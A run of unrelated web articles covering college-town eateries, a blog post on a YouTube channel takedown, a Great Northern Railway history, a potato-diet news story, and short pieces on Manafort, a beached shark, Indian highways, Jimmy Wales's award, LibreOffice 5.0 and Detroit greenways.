The line is always snaking out the door at Diddy Riese Cookies in Westwood , just off the UCLA campus . Indulging in one of their ice cream sandwiches has been a right of passage for both Bruins and Angelenos since 1983 . With 10 traditional flavors of freshly baked cookies and 12 flavors of Dreyer 's ice cream , there 's a combination that will satisfy anyone 's sweet tooth . And at $ 2 each , it 's hard to try just one . The cash-only joint serves up cookie sundaes , brownies , and Hawaiian shaved ice at low-prices , too .
Half Fast Subs
University of Colorado
Half Fast Subs is a favorite of CU students and Boulder residents alike . Be warned : the menu is long … like really long . Choose from over 100 different hot and cold sub sandwiches from seafood to vegetarian to stuffed to assorted cheesesteaks . Standouts include the Ba-Donk-a-Donk , a combination of roast beef , Chicago hot peppers , cheddar cheese , and bacon , and The Gobbler with turkey , stuffing , gravy , and cranberry sauce . Once you commit to a sandwich , wash it down with a pitcher of Peach Panther or a N'Awlin 's Hurricane .
Ian 's Pizza by the Slice
University of Wisconsin
Ask any Badger where they 're headed after a night of State Street bar-hopping and you 'll get the same answer : Ian 's . The Madison , Wisconsin-based nontraditional pizza joint has been dishing up its famed macaroni-and-cheese topped slice to hungry college kids since 2001 . If mac-and-cheese is n't your thing , try Spicy Chicken Taco , BBQ Brisket and Tots , or Sausage Penne Alfredo . The local chain has been so successful that you can now grab a slice in Milwaukee , Seattle , and Denver .
Merritt 's Store & Grill
University of North Carolina—Chapel Hill
Undergrads in Chapel Hill know where to get a good B.L.T : Merritt 's . Do you want a single , a double , or a triple ? How about avocado or pimento cheese ? Merritt 's takes the B.L.T . to the next level . This 1920s-era gas-station-turned-sandwich-shop is not the cheapest , but it is charming , and students make the pilgrimage to check the box off this UNC bucket list experience . Do n't forget to wash down your sandwich with a glass bottle of Cheerwine , of course .
Q Shack
Duke University
When Duke students are craving barbecue , they come to Q Shake for melt-in-your mouth beef brisket and extra-large portions . All the meat at this Durham , North Carolina , joint is smoked in-house and comes with two sides , such as jack cheese creamed spinach and fried okra , as well as a serving of hush puppies . It 's hard to walk away hungry , and much of the menu is under $ 10 . A perfect storm for the hungry student .
Shakespeare 's Pizza
University of Missouri
Shakespeare 's keeps it simple : a small menu , affordable prices , and dang good pizza . That 's why Mizzou students keep coming back for more . It probably helps that they get more with each order . Their large pizza is 16 inches , which is two inches more than traditional larges or a third bigger . “ Shake 's ” has been named one of the best college eats in the nation , so it 's not surprise that they 've started shipping frozen pies to alumni across the country .
The Rathskeller
University of Miami
Since the 1970s , ‘ The Rat ” has been a campus institution serving reasonably-priced classic fare , like burgers and wings , to Miami students . But recent undergrads are lucky enough to enjoy the new location in the upgraded Student Activities Center . It 's situated on prime lakefront property on the Coral Gables campus . There are TVs and beer inside and views of Lake Osceola outside . A large menu and daily specials power students through the semester .
Zingerman 's Delicatessen
University of Michigan
What started as a small , simple Jewish deli in 1983 has turned into an Ann Arbor staple—and so much more . In addition to its iconic sandwiches , you 'll find gourmet specialty items , candies , breads , cheeses , pastries , and more . The grocery-slash-deli has its own mail order business so alumni can ship their favorite Reuben accouterment across the country . The now-booming business has overflowed from its original location and into the renovated house next door . But the lines are still as legendary as their sandwiches .
After YouTube took down our channel , but now they are safe and secure .
I was going to write something profound and deep tonight about the takedown of Legal Insurrection 's YouTube account after the Modern Language Association filed three ( 3 ) copyright claims with YouTube relating to my coverage of the arguments made at an MLA annual meeting town hall in favor and against the academic boycott of Israel .
* Perhaps * it was total * coincidence * that three ( 3 ) claims were filed considering that YouTube has a well-known three strikes rule — three claims and they may remove your channel and account . Which is what happened even before I knew there was a copyright claim by MLA ( it never contacted us ) .
* Eventually * we 'll find out * why * three ( 3 ) claims were filed . I sure hope people are not deleting emails , that would look really bad .
We do know that the group leading the anti-Israel boycott effort had complained to MLA that MLA posted the full 2 hours audio on YouTube , and was upset with our excerpts used in our reporting .
They even complained that our posting excerpts of what some people actually said was harassment ( seriously ) .
That fits a pattern — the anti-Israel BDS academics hate , hate , hate , hate when you quote what they say , and what better way to prove what they said than an audio or video .
This all took me by surprise . I was looking at a post on Legal Insurrection sometime in the evening Thursday night , and noticed a video was not loading ( leaving a grayish , shadowy image of a YouTube screen ) . I clicked on the grayish “ play ” symbol and text appeared stating that the account associated with the video had been terminated because of multiple claims of copyright infringement . It took about 1 second and then I realized , wait a second , that 's OUR account ! That 's how I found out .
I clicked over to our YouTube Channel and saw this :
To say my stomach sank is an understatement . This was not something I ever wanted to see considering that our YouTube channel contained over 200 videos accumulated over 8 years , including my many speeches , original video reporting , video compilations we created , video obtained after much litigation and court order , and ‘ fair use ' excerpts of other reporting .
We managed to get the account restored Friday night .
Major thanks are owed to “ our attorney ” Ron Coleman who was immediately available to me Thursday night for consultation , to the many readers who reached out offering to help , to the readers and social media users who took it on their own initiative to complain to YouTube , to the Twitter brigade which quickly moved into action ( too many people to mention ) , and to the media which brought this into the public spotlight , including Fox News ( linked by Drudge ) , Instapundit , The Washington Times , Breitbart News , The Blaze , The Free Beacon , and others in the blogosphere who spread the links .
This so much reminded me of the * old days * when conservative people/blogs/media were able to swarm in support of a colleague in need . All I can say is , thanks .
So yes , I will have a lot more to say about this . And it will be profound and deep .
But the Patriots are playing tonight , and it 's Saturday night , so this is not necessarily the best time for profound and deep thoughts .
I spent much of today downloading over 200 videos from our recently restored YouTube channel , and uploading them to another service for safekeeping , in case we 're hit with unjustified copyright complaints by someone else who just happens , by complete * coincidence * , to file three ( 3 ) claims triggering the YouTube three strike rule , just * by chance * and without any * malice * aforethought .
As I went through that process , I realized just how many great videos we had , and how much would have been lost had we not been able to recover the account .
So , considering this is Saturday night and the Patriots are playing , the most profound and deep thoughts I have are to compile a listicle of my 20 Favorite Videos from our YouTube account that almost disappeared from the internet . This is not necessarily a measure of which videos had the most views or had some other intrinsic news or other value . I 'm also excluding interviews of me and speeches by me , because the last thing I would want you to think is that I like hearing myself talk .
So this is just a listicle of the videos I * favorite * at this moment in the history of the world and of Legal Insurrection .
In reverse order :
20 . Joe Biden kisses Chris Coons ' Daughter
Creepy uncle Joe . Never stop being you . On second thought , stop being you .
19 . Arab woman stabs Israeli
Remember , They are the victim .
18 . Martha Robertson for Single Payer
Probably the most impact we 've ever had in a congressional race was our coverage of the NY-23 race in 2014 between Tom Reed and Martha Robertson .
17 . Jerusalem Day 2016 – Western Wall
Oh , to be in Jerusalem on Jerusalem Day .
16 . Cornell Pro-Israel Students Taunted
Thugs .
( language warning )
15 . BDS Bullies at NUI Galway
This guy tried to get this taken down from YouTube because it violated their privacy ! We won that fight , and it remains on YouTube .
( language warning )
14 . Yoga Pants Protest
When all else is failing in your life , protest against a guy who criticized yoga pants .
13 . 2nd Anniversary of George Zimmerman Acquittal
Well-deserved Kudos from Don West for Andrew Branca .
12 . UT-Austin Anti-Israel Protesters Disrupt Event
Bullies . But it did n't work .
11 . Anti-Israel Protester Shouts Fake Gandhi Quote
What deranged anti-Israel protest is complete without a fake Gandhi quote ?
10 . UCLA Student Melts Down After Divestment Defeat
Epic , but they eventually saw the light and realized the error of their anti-Israel ways .
9 . Rush Limbaugh reads “ We Just Witnessed The Media 's Test Run
I said I would n't pick any videos of me talking about myself . This is not ME talking about me .
8 . National Empty Chair Day — Special Report with Bret Baier 9-3-2012
We started it .
7 . Elizabeth Warren – I was the first nursing mother to take a Bar exam in New Jersey
And this is who Dems want to run the world ? For pure comedy gold , this made the list .
6 . Heartbreak of Terrorism – A Mother 's Memory
Heartbreaking . At every level .
5 . Unaccountable – Elizabeth Warren and the Cherokee
We crammed the Case Against Elizabeth Warren into one video .
4 . WWII Vet – Removing Barricades “ Blew My Mind … It Was Great ”
The Greatest Generation , indeed .
3 . Elizabeth Warren runs when asked about being Woman of Color
I love this video . Thanks Anne Sorock for being you .
2 . Activists manipulate third-graders into hating Israel
It took a year of litigation , but we got it . Sickos manipulating little kids .
1 . Veteran Stands Up For 2nd Amendment At Chicago Anti-Gun Forum
I must-watch . Reminds me of that Norman Rockwell painting .
This article is about the US railway . For other railways with the same name , see Great Northern Railway
The Great Northern Railway ( reporting mark GN ) was an American Class I railroad . Running from Saint Paul , Minnesota , to Seattle , Washington , it was the creation of 19th-century railroad entrepreneur James J. Hill and was developed from the Saint Paul & Pacific Railroad . The Great Northern 's ( GN ) route was the northernmost transcontinental railroad route in the U.S .
In 1970 the Great Northern Railway merged with three other railroads to form the Burlington Northern Railroad , which merged in 1996 with the Atchison , Topeka and Santa Fe Railway to form the Burlington Northern and Santa Fe Railway .
The Great Northern was the only privately funded – and successfully built – transcontinental railroad in U.S . history . [ 1 ] [ 2 ] No federal subsidies were used during its construction , unlike all other transcontinental railroads . [ 1 ]
History [ edit ]
The Great Northern was built in stages , slowly to create profitable lines , before extending the road further into the undeveloped Western territories . In a series of the earliest public relations campaigns , contests were held to promote interest in the railroad and the ranchlands along its route . Fred J. Adams used promotional incentives such as feed and seed donations to farmers getting started along the line . Contests were all-inclusive , from the largest farm animals to the largest freight carload capacity and were promoted heavily to immigrants and newcomers from the East .
The earliest predecessor railroad to the GN was the St. Paul and Pacific Railroad , a bankrupt railroad with a small amount of track in the state of Minnesota . James Jerome Hill convinced John S. Kennedy ( a New York banker ) , Norman Kittson ( Hill 's friend and a wealthy fur trader ) , Donald Smith ( an executive with Canada 's Hudson 's Bay Company ) , George Stephen ( Smith 's cousin and president of the Bank of Montreal ) , and others to invest $ 5.5 million in purchasing the railroad . On March 13 , 1878 , the road 's creditors formally signed an agreement transferring their bonds and control of the railroad to Hill 's investment group . On September 18 , 1889 , Hill changed the name of the Minneapolis and St . Cloud Railway ( a railroad which existed primarily on paper , but which held very extensive land grants throughout the Midwest and Pacific Northwest ) to the Great Northern Railway . On February 1 , 1890 , they transferred ownership of the StPM & M , Montana Central Railway , and other rail systems they owned to the Great Northern .
The Great Northern had branches that ran north to the Canada–US border in Minnesota , North Dakota , and Montana . It also had branches that ran to Superior , Wisconsin , and Butte , Montana , connecting with the iron mining fields of Minnesota and copper mines of Montana . In 1898 Hill purchased control of large parts of the Messabe Range iron mining district in Minnesota , along with its rail lines . The Great Northern began large-scale shipment of ore to the steel mills of the Midwest . At its height , Great Northern operated over 8,000 miles .
Revenue freight traffic , in millions of net ton-miles ( incl FG & S ; not incl PC or MA & CR ) Year Traffic 1925 8521 1933 5434 1944 19583 1960 15831 1967 17938 Source : ICC annual reports
The railroad 's best known engineer was John Frank Stevens , who served from 1889 to 1903 . Stevens was acclaimed for their 1889 exploration of Marias Pass in Montana and determined its practicability for a railroad . Stevens was an efficient administrator with remarkable technical skills and imagination . They discovered Stevens Pass through the Cascade Mountains , set railroad construction standards in the Mesabi Range of northern Minnesota , and supervised construction of the Oregon Trunk Line . They then became the chief engineer of the Panama Canal .
The logo of the railroad , a Rocky Mountain goat , was based on a goat William Kenney , one of the railroad 's presidents , had used to haul newspapers as a boy . [ 9 ] [ 10 ] [ 11 ]
Mainline [ edit ]
The mainline began at Saint Paul , Minnesota , heading west and topping the bluffs of the Mississippi River , crossing the river to Minneapolis on a massive multi-piered stone bridge . The Stone Arch Bridge stands in Minneapolis , near the Saint Anthony Falls , the only waterfall on the Mississippi . The bridge ceased to be used as a railroad bridge in 1978 and is now used as a pedestrian river crossing with excellent views of the falls and of the lock system used to grant barges access up the river past the falls . The mainline headed northwest from the Twin Cities , across North Dakota and eastern Montana . The line then crossed the Rocky Mountains at Marias Pass , and then followed the Flathead River and then Kootenai River to Bonners Ferry , Idaho , South to Sandpoint , Idaho , west to Newport , Washington and then to Spokane , Washington , passing by the extensive railroad facility of Hillyard , Washington . From here , the mainline crossed the Cascade Mountains through the Cascade Tunnel under Stevens Pass , reaching Seattle , Washington , in 1893 , with the driving of the last spike at Scenic , Washington , on January 6 , 1893 .
The main line west of Marias Pass has been relocated twice . The original route over Haskell Pass , via Kalispell and Marion , Montana was replaced in 1904 by a more circuitous but flatter route via Whitefish and Eureka , joining the Kootenai River at Rexford , Montana . A further reroute was necessitated by the construction of the Libby Dam on the Kootenai River in the late 1960s . The Army Corp of Engineers built a new route through the Salish Mountains , including the 7-mile-long Flathead Tunnel , second-longest in the United States , to relocate the tracks away from the Kootenai River . This route opened in 1970 . The surviving portions of the older routes ( from Columbia Falls to Kalispell and Stryker to Eureka , are now operated by Watco as the Mission Mountain Railroad .
The Great Northern mainline crossed the continental divide through Marias Pass , the lowest crossing of the Rockies south of the Canada–US border . Here , the mainline forms the southern border of Glacier National Park , which the GN promoted heavily as a tourist attraction . GN constructed stations at East Glacier and West Glacier entries to the park , stone and timber lodges at the entries and other inns and lodges throughout the Park . Many of the structures have been listed on the National Register of Historic Places due to unique construction , location and the beauty of the surrounding regions .
In 1931 the GN also developed the `` Inside Gateway , '' a route to California that rivaled the Southern Pacific Railroad 's route between Oregon and California . The GN route was further inland than the SP route and ran south from the Columbia River in Oregon . The GN connected with the Western Pacific at Bieber , California ; the Western Pacific connected with the Atchison , Topeka , and Santa Fe in Stockton , California , and together the three railroads ( GN , WP , and ATSF ) competed with Southern Pacific for traffic between California and the Pacific Northwest . With a terminus at Superior , Wisconsin , the Great Northern was able to provide transportation from the Pacific to the Atlantic by taking advantage of the shorter distance to Duluth from the ocean , as compared to Chicago .
Settlements [ edit ]
A 1909 ad aimed at settlers from a St. Paul Newspaper
The Great Northern energetically promoted settlement along its lines in North Dakota and Montana , especially by Germans and Scandinavians from Europe . The Great Northern bought its lands from the federal government – it received no land grants – [ citation needed ] and resold them to farmers one by one . It operated agencies in Germany and Scandinavia that promoted its lands , and brought families over at low cost , building special colonist cars to transport immigrant families . The rapidly increasing settlement in North Dakota 's Red River Valley along the Minnesota border between 1871 and 1890 was a major example of large-scale `` bonanza '' farming .
Later history [ edit ]
On March 2nd , 1970 the Great Northern , together with the Northern Pacific Railway , the Chicago , Burlington and Quincy Railroad and the Spokane , Portland and Seattle Railway merged to form the Burlington Northern Railroad . The BN operated until 1996 , when it merged with the Atchison , Topeka and Santa Fe Railway to form the Burlington Northern and Santa Fe Railway .
In popular culture [ edit ]
The Great Northern Railway is considered to have inspired ( in broad outline , not in specific details ) the Taggart Transcontinental railroad in Ayn Rand 's Atlas Shrugged . The railroad is mentioned in the lyrics of the Grateful Dead song Jack Straw : `` Great Northern , out of Cheyenne , from sea to shining sea '' .
In Season One of Hey Arnold , the episode `` Haunted Train '' depicts the fictitious Engine 25 , a 4-8-2 under the GNR mantle wrecked near Arnold 's hometown due to a psychotic engineer . Now the ghost of the train apparently picks up unsuspecting passengers and takes them to Hell , driven by the insane engineer .
Revenue freight traffic , in millions of net ton-miles ( incl FG & S ; not incl PC or MA & CR ) Year Traffic 1925 8521 1933 5434 1944 19583 1960 15831 1967 17938 Source : ICC annual reports
Passenger service [ edit ]
GN operated various passenger trains , but the Empire Builder was their premier passenger train . It was named in honor of James J. Hill , known as the `` Empire Builder . '' Amtrak still operates the Empire Builder today , running it over the old Great Northern 's Northern Transcon north of St. Paul .
Named trains [ edit ]
Unnamed trains [ edit ]
Nos . 23–30 : St. Cloud–Grand Forks
Nos . 31–32 : Sandstone-Willmar
Nos . 35–36 : Duluth-Grand Forks
Nos . 43–42 : Billings-Sweetgrass
Nos . 43–42 : Billings-Great Falls local ( GN 's only RDC operation )
Nos . 47–48–49–50 : Morris-Browns Valley
Nos . 53–54 : Watertown-Sioux Falls
Nos . 61–60 : Minneapolis-Hutchinson
Nos . 99–100 : Fargo-Minot via Grand Forks
Nos . 105–106 : Sauk Center-Bemidji
Nos . 131–132 : Crookston-Noyes
Nos . 135–136 : Crookston-Warroad
Nos . 161–162 : Garretson-Sioux City
Nos . 185–186 : Willmar-Huron via Benson
Nos . 197–198 : Breckenridge-Larimore
Nos . 201–202 : Grand Forks-Larimore
Nos . 215–215 : Neilhart-Great Falls
Nos . 219–220 : Berthold-Crosby
Nos . 221–222 : Havre-Great Falls Nos . 223–224 : Williston-Havre
Nos . 235–236 : Havre-Great Falls Western Star connection ( later used GN 's only RDC )
connection ( later used GN 's only RDC ) Nos . 237–238 : Havre-Great Falls Empire Builder connection
connection Nos . 243–244–245–246–247–248–249–250 : Columbia Falls-Kalispell
Nos . 253–254 : Oroville-Wenatchee
Nos . 255–256 : Nelson , BC-Spokane
Nos . 285–286 : Snowden-Richey via Fairview
Nos . 287–288 : Watford City-Fairview
Nos . 289-290 : Williston , Bainville-Scobey
Nos . 291–292 : Fairview-Sidney
Nos . 301–302 : Fergus Falls-Pelican Rapids
Nos . 317–318 : Sioux Falls-Yankton
Nos . 359–358 : Vancouver , BC-Seattle
Nos . 365–366 : Great Falls-Augusta
Nos . 367–368 : Lewiston-Moccasin
Nos . 371-372 : Williston , Bainville-Opheim ( mixed )
Nos . 373–374 : Great Falls-Pendroy
Nos . 401–402 : Seattle-Portland ( four months per year ) – joint Coast Pool train with Northern Pacific ( NP ) and Union Pacific Railroad ( UP )
Nos . 459–460 : Seattle-Portland – joint Coast Pool train with NP and UP
Rails to trails [ edit ]
In addition to the Stone Arch Bridge , parts of the railway has been turned into pedestrian and bicycle trails . In Minnesota , the Cedar Lake Trail is built in areas that were formerly railroad yards for the Great Northern Railway and the Minneapolis and St. Louis Railway . Also in Minnesota , the Dakota Rail Trail is built on 26.5 miles of the railroad right-of-way . Further west , the Iron Goat Trail in Washington follows the late 19th-century route of the Great Northern Railway through the cascades and gets its name from the railway 's logo . [ 21 ] [ 22 ]
See also [ edit ]
By AFP
An Australian man who plans to eat nothing but potatoes for an entire year said Tuesday that despite their strange diet they were not only feeling better , but surprisingly enjoying their meals .
Unlike Matt Damon 's character in `` The Martian '' , who is stranded on the Red Planet with little else to eat , Andrew Taylor , 35 , made a deliberate decision to eat only the starchy staple for 12 months , to break what they termed their `` food addiction '' .
While addicts can go `` cold turkey '' on their vice , such as alcohol or cigarettes , it is impossible to do so with food , so Taylor settled on making their diet as boring as possible .
`` The next best thing was to find one thing that sustained me healthily , '' they told AFP , saying that besides potatoes , they also considered mangoes , bananas and watermelon .
After deciding there were more options with the humble spud , Taylor now eats as many as they want each day , boiled , mashed and even made into pancakes , occasionally flavouring them with seasonings such as garlic and salt .
`` I 'm not having any fats , no butter , no meat , no dairy ... no oil either , '' the stay-at-home dad said , adding they were coping well on day 54 .
Taylor is documenting their experience on their Spud Fit Facebook page , which has more than 6,000 likes , and says while losing weight was not their ultimate goal , they have so far shed 17 kilograms ( 37 pounds ) .
`` I 'm sleeping better and have better mental clarity and focus , '' they said , adding that their joint pain from playing football had also disappeared .
Taylor shrugged off the idea that they are not getting enough nutrients , saying they are taking vitamin B12 tablets and is under medical supervision .
`` People assume that I am going to be sick and die , '' they joke . `` If I feel sick , I 'll just eat something else . ''
While he 's no food activist , and insists they are not trying to make people follow their diet , Taylor believes the potato is vastly underrated .
`` Potatoes are a real powerhouse , '' they said , adding that they were amazed at how their radical eating plan had attracted media interest worldwide .
`` The biggest surprise of all is that I 'm enjoying it . ''
In today 's White House press briefing , press secretary Sean Spicer said this of Paul Manafort 's involvement in the Trump presidential campaign :
`` Obviously , there 's been discussion of Paul Manafort , who played a very limited role for a very limited amount of time . ''
It 's understandable that the White House would want to distance itself from someone who has reportedly been investigated by the FBI for ties to Russia . But this is a bit much .
Let me bring up this story that appeared in the Washington Examiner last June 20 . The piece , headlined , `` Trump adviser : Paul Manafort 'totally in charge ' of campaign , '' explains candidate Trump 's decision to ditch Corey Lewandowski as their campaign manager and put campaign chairperson Paul Manafort , who had been with Trump 's campaign since late March , squarely in charge of everything . And it was Trump 's own decision , too .
Following the ouster of campaign manager Corey Lewandowski , Barry Bennett , a senior adviser to Donald Trump , announced Monday that campaign chairperson Paul Manafort is `` totally in charge '' of the operation ... '' Mr. Trump obviously made a decision this morning , '' Bennett told Fox News ' Martha MacCallum . `` I 've not yet talked to them about it , or anyone at the campaign for that matter . But I think they wanted to go in a different direction , and it 's their campaign . ''
To be sure , that does n't mean anything untoward happened with Russia . Manafort is a hired gun . But being completely in charge is not what most people would describe as a `` limited role . ''
Here 's something you probably do n't expect to see on your morning walk on Revere Beach : the body of a 6 ½-foot-long shark , looking like a prop straight out of a “ Sharknado ” movie .
That 's why hundreds stopped by the scene Friday morning after the fish washed ashore , Revere assistant harbormaster John Hurley said .
The shark , a young adult porbeagle that weighed around 200 pounds , washed up in the area of Mills Avenue and Archer Avenue around 10:45 a.m. when the tide came in . It had also been spotted in the water belly-up several times Wednesday and Thursday , Hurley said .
Advertisement
There were no visible wounds on the shark to indicate how it died , Hurley said . They speculated it could have suffocated after getting stranded on shore .
Get Metro Headlines in your inbox : The 10 top local news stories from metro Boston and around New England delivered daily . Sign Up Thank you for signing up ! Sign up for more newsletters here
Based on the Thursday sightings of the shark and the relatively good condition its body was in , Hurley said the shark likely died very recently .
“ It looks like they suffocated himself , ” they said . “ He very well could have died on the beach this morning . ”
Greg Skomal , a state marine biologist , said there are plenty of porbeagles swimming off the coast of Massachusetts . Hurley said you can find them from New Jersey all the way to the Mediterranean Sea .
But they 're typically not found dead on a beach in otherwise perfect condition .
Advertisement
“ It 's a New England shark , but you typically do n't find them on the beach , ” Skomal said .
Porbeagles are not classified as endangered in the United States , although fishing officials do list them as “ overfished , ” the New England Aquarium said in a statement Friday . The sharks were once common off the coast of Cape Cod , but their numbers dropped after they were targeted by foreign fishing fleets in the 1970s and 1980s .
The predators consume strictly squid and fish . They do n't eat seals or people .
Nevertheless , Hurley said , beachgoers were frightened as well as intrigued .
“ Some people were freaked out by it , ” they said . “ I heard a bunch of people say , ‘ Well , that 's the end of my swimming for the summer . ' ”
Steve Annear of the Globe staff contributed to this report . Alyssa Meyers can be reached at alyssa.meyers @ globe.com . Follow them on Twitter @ ameyers_
Centre is considering beautifying Mumbai-Goa highway on the lines of Los Angeles-San Francisco highway
Highlights Nitin Gadkari said they came up with the idea during their visit to the US Centre is in the process of promoting road-side amenities : Gadkari They said 35,000 kms of roads would be upgraded as national highways soon
The government is considering the possibility of beautifying the surroundings of Mumbai-Goa national highway along the seacoast on the lines of the road linking Los Angeles and San Francisco in the United States.Union Minister Nitin Gadkari said during their visit to the US two months ago , they travelled by road from San Francisco to Los Angeles along the Pacific ocean , and for the first time saw how roadsides can be beautified.Mr Gadkari said that the Centre is in the process of promoting road-side amenities , including hotels and motels . `` We have to think if we can use the nature 's beauty and further beautify ( the road-side stretch ) '' , they said.The Minister said they have asked the Maharashtra State Road Development Corporation ( MSRDC ) to prepare a detailed project report on whether the Mumbai-Goa road can be developed on the lines of Los Angeles-San Francisco road . `` So , the process is on . People should enjoy their ride travelling by road , '' they said , inaugurating the 77th annual session of the Indian Roads Congress.Mr Gadkari said their Ministry has finalised an estimate to construct 2,000 Railway overbridges , and they favoured `` pre-cast '' centres in districts to undertake such works.He said 35,000 kms of roads would be upgraded as national highways soon.When they took over as Minister , 403 road projects valued at Rs 3.75 lakh crore had been stalled because of issues related to land acquisition , and environment and forest clearances . `` 95 per cent of those projects no longer face such problems '' , the Minister said.The minister also said 1300 spots have been identified in the country for providing road-side amenities -- like hotels , motels , petrol bunks and helipads -- which would offer tremendous employment opportunities for locals , and 70 tenders have already been floated in this regard . Government also plans to come out with a mechanism by which engineering graduates -- particularly diploma-holders and those from polytechnics -- get jobs in the area of bridge maintenance and other minor works so that they also become contractors , they added .
The Wikipedian of the Year award is surely one of the Internet 's stranger prizes . It does not exist in any formal sense , and its winners do not always know they have won . Wikipedia does n't actually sponsor it . There are , in fact , no published criteria for winning the award ; that 's entirely the discretion of Jimmy ( “ Jimbo ” ) Wales , the encyclopedia 's cofounder ( and “ God-king “ ) , who now sits on the board of trustees .
And they owe the two winners $ 5,000 each .
Rauan Kenzhekhanuly won the inaugural award in 2011 for their work building a robust Kazakh language Wikipedia—work that would later become the subject of controversy , after online sleuths dug up that their project was enabled in part by a fund run by the autocratic Kazakh regime . Wales announced the prize at the 2011 Wikimania , the annual Wikipedia conference .
In the year and a half since winning , Kenzhekhanuly has n't seen a dime . Wales has publicly acknowledged this fact . But they say there 's nothing fishy about it . “ The actual money has not been transferred yet , as the concept has always been that I 'd do it ceremonially when I go to Kazakhstan , which I 've not managed yet , ” Wales wrote on their Wikipedia talk page on April 22 .
That 's all well and good , but Kenzhekhanuly is n't the only winner who 's never had a sniff of their prize money . And at least when Kenzhekhanuly won , the news was greeted with some fanfare in the form of press releases and newspaper articles . Last year 's winner , a Wikipedian called “ Demmy , ” did n't even know about the prize until attendees at Wales ' speech told them about it on their Wikipedia user page ( “ Jimbo Wales has just announced the Wikipedian of the Year award , and it is you ! ” a Rich Farmbrough wrote . “ Congratulations ! ” )
Wales had once again announced the prize at Wikimania , held in Washington D.C. in July 2012 , though this time the award 's name had changed . It was now simply the “ Jimbo Award ” —an attempt perhaps to emphasize that Wikimedia has no formal ties to the award .
“ It 's not something the Wikimedia Foundation has been involved with , ” Wikimedia 's communication head , Jay Walsh , told the Daily Dot . “ This is Jimmy 's personal initiative . ”
At least two accounts of Wales 's Wikimania speech indicate they once again promised a prize of $ 5,000 , from their own pocket . But it appears to have taken Wales more than five months to finally reach out to Demmy himself .
Demmy—who Wales has apparently never met—had programmed a bot to translate short English Wikipedia articles into their native Yoruba , a language spoken widely across Nigeria . The fruit of their labor was 15,000 new , machine-translated articles in the Yoruba language Wikipedia .
After reaching out to Demmy in January 2013 , Wales promised to pay them the $ 5,000 in prize money after returning from Switzerland , where he 'd be attending the World Economic Forum in Davos from Jan. 23 to 27 .
Three months later , Demmy still had n't heard a peep out of Wales . Here 's what they told the Daily Dot in an email earlier today :
In January , Wales contacted me and told me the award carry prize money of $ 5000 which , they said , they intended to give to me . My last email to Wales was on March 29 , 2013 . Yes they promised to pay the award money in the last email they sent me on 20th January 2013 , there they said they were going to Davos but will process the paper work when they get back the following Monday . That was the last I heard of him .
They added : “ I sent them 2 emails since then ( on Feb 22 [ and ] Mar 29 ) but they did n't reply to either of them . ”
It sounds like that 's about to change . After we contacted Wales about Demmy 's situation , they responded : “ First I heard of it . I 'm in touch with them now . Thanks for the heads-up . ”
Photo via William Brawley/Flickr
Software : :Büro
LibreOffice 5.0 freigegeben
Die Document Foundation hat die Freigabe von LibreOffice 5.0 bekanntgegeben . Die neue Hauptversion der freien Office-Suite bringt eine übersichtlichere Benutzeroberfläche , zusätzliche und erweiterte Filter zum Lesen und Schreiben von Fremdformaten und viele weitere Verbesserungen .
Document Foundation Eingabe von Unicode-Zeichen mittels der Standard-Codes
Gut ein halbes Jahr nach LibreOffice 4.4 steht jetzt LibreOffice 5.0 wie angekündigt bereit , wie die Document Foundation bekannt gab . LibreOffice 5.0 präsentiert sich laut der Ankündigung mit einer deutlich verbesserten , übersichtlicheren Benutzeroberfläche . Dank neuer und erweiterter Filter für den Umgang mit proprietären Formaten wurde die Kompatibilität unter anderem zu Microsoft Office und Apple iWork weiter verbessert .
Die Oberfläche von LibreOffice 5.0 bringt den Nutzern neugestaltete Icons und Verbesserungen bei den Menüs und der Sidebar . Zudem soll das Formatieren von Texten dank der Vorschaumöglichkeit direkt im Programm intuitiver werden .
Wenn man eine Schrift einsetzt , die dem Unicode 6-Standard entspricht , kann man nun in der Textverarbeitung Writer Emojis nutzen . Nicht nur Emojis , sondern auch alle anderen Unicode-Zeichen kann man mit Hilfe der de-Facto-Standard-Codes textuell eingeben . Writer ersetzt die Kurzcodes dann automatisch durch die korrekten Zeichen . Die Handhabung ist ein Spezialfall der automatischen Korrektur in LibreOffice .
Fotostrecke : 9 Bilder
Stile lassen sich in der Seitenleiste als Vorschau anzeigen . Die Texthervorhebung wurde mit MS Word kompatibel gemacht , Bilder können beschnitten werden und die angezeigte Seitennummer wird besser berechnet . Tabellen und die Kompatibilität mit MS Office-Dateiformaten wurden weiter verbessert .
Die Tabellenkalkulation Calc kann mit Formatierungsoptionen für Balkengrafiken aufwarten , die bisher nicht über die Oberfläche zugänglich waren . Zusätzliche Optionen für die Darstellung kamen hinzu . Weitere Neuerungen sind wissenschaftliche Zahlenformate und Verbesserungen der Formel-Engine .
In allen Komponenten wurden die Werkzeugleisten verbessert . Der PDF-Export unterstützt nun das Time-Stamp Protocol . Neben der Unterstützung des Adobe Swatch Exchange-Formats zum Import von Farbpaletten kamen auch neue Importfilter hinzu , darunter für Apple Pages 09 und frühere Versionen , und bestehende wurden verbessert . Auch die Übersetzung in verschiedene Sprachen machte Fortschritte . Das in Teilen von Paraguay gesprochene Guarani kam neu hinzu und ist vollständig . Weitere Übersetzungen wurden neu begonnen oder ausgeweitet . Nicht zuletzt werden nach Angaben der Entwickeler immer mehr Tests mit LibreOffice durchgeführt , so dass Qualität und Stabilität der Suite stetig zunehmen sollen . Die zahlreichen weiteren Änderungen kann man im Detail in den Anmerkungen zur Veröffentlichung nachlesen .
LibreOffice 5.0 wird zunächst allen empfohlen , die sich für die Neuerungen begeistern können , während Firmen und Organisationen mit der Aktualisierung noch warten sollten . Ihnen wird empfohlen , noch bei Version 4.4 zu bleiben und beim Einsatz von LibreOffice professionelle Supportverträge abzuschließen . LibreOffice 5.0 steht ab sofort auf der Downloadseite bereit .
Two big projects have received a big boost in the past few weeks . The first will help to connect the city via bike , and the second will offer a new place for recreation along the riverfront .
The Inner Circle Greenway , a 26-mile non-motorized loop around the city , recently received a $ 2 million grant from the Ralph C. Wilson Jr. Foundation , according to the Detroit News . The City of Detroit says this will go toward design and preconstruction . The city recently acquired an important 7.5-mile stretch of land that will help finish the greenway . When completed , it will go all the way from the Riverfront and the Dequindre Cut , up through Hamtramck , around Highland Park , and down the west side near University of Detroit Mercy , and back to the Riverfront . The project could be finished in late 2019 .
The Detroit RiverFront Conservancy recently received a $ 50,000 grant from Gannett 's Community Thrives program for Atwater Beach , which will connect two parts of the East Riverfront with a beach-like ( non-swimming ) public space .
Atwater Beach will be located near Chene Park and it will have a cafe , play equipment , and sandy space over 3.2 acres . The DRFC is still fundraising for the project , but they hope to start construction next year .
